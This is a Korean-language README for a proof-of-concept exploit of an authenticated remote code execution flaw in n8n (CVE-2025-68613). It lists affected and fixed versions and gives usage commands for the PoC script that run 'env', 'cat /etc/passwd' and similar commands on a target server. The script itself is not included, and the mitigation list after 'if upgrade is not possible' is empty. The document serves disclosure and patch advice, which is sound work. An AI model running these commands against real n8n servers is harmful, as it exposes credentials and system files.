
CVE-2025-68613 — Expression Injection을 통한 n8n RCE
교육 및 승인된 보안 연구 목적으로만 사용하세요.
n8n 워크플로 자동화 플랫폼의 치명적인 RCE 취약점(CVSS 9.9)입니다. 인증된 사용자는 샌드박스 제한을 우회하여 executeCommand 노드를 통해 임의의 OS 명령을 실행할 수 있습니다.
| 필드 | 세부 사항 |
|---|---|
| CVE | CVE-2025-68613 |
| CVSS | 9.9 (치명적) |
| 영향을 받는 버전 | >= 0.211.0 < 1.120.4 |
| 인증 필요 | 예 (워크플로 생성 권한이 있는 모든 사용자) |
| 테스트 환경 | n8n 1.119.1 |
| 수정된 버전 | 1.120.4, 1.121.1, 1.122.0 |
n8n은 서버 측에서 워크플로 노드 매개변수를 평가합니다. executeCommand 노드는 n8n 프로세스의 권한으로 호스트에서 직접 셸 명령을 실행합니다. 워크플로 생성 또는 편집 권한이 있는 모든 인증된 사용자는 이를 악용하여 완전한 RCE를 달성할 수 있습니다.
bash poc_final.sh <대상> <이메일> <비밀번호> <명령>
예제:
# 기본 RCE
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'id'
# 환경 변수 읽기 (자격 증명/API 키 포함 가능)
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'env'
# 민감한 파일 읽기
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'cat /etc/passwd'
# n8n 데이터 디렉토리 목록 보기
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'ls -la ~/.n8n/'
참고: 비밀번호에
!와 같은 특수 문자가 포함된 경우 작은따옴표를 사용하세요.
즉시 n8n >= 1.120.4로 업그레이드하세요.
즉시 업그레이드가 불가능한 경우:
이 도구는 교육 목적 및 승인된 보안 테스트로만 제공됩니다. 귀하가 소유하지 않거나 명시적인 서면 허가를 받지 않은 시스템에 대한 무단 사용은 불법입니다. 작성자는 어떠한 오용에 대해서도 책임을 지지 않습니다.